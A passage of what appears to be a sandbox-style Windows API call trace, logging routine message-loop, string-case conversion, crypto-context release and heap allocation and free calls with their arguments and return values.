cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.471] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.471] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.471] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.471] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.471] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.471] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.471] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.471] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.471] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.471] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.471] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.471] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.471] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.472] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.472] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.472] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.472] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.472] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.472] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.472] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.472] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.472] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.472] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.472] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.472] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.472] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.472] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.472] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.472] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.472] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.472] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.472] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.472] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.472] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.473] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.473] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.473] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.473] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.473] CryptReleaseContext (hProv=0xaa3868, dwFlags=0x0) returned 1 [0190.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.474] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.475] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.475] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0190.475] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.475] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.475] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0190.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0190.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.476] FreeLibrary (hLibModule=0x74d40000) returned 1 [0190.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0190.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.476] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.476] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0190.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.476] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0190.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.477] CloseHandle (hObject=0x294) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.478] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0190.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0190.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0190.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0190.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0190.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0190.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.479] CloseHandle (hObject=0x268) returned 1 [0190.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.481] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0190.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: 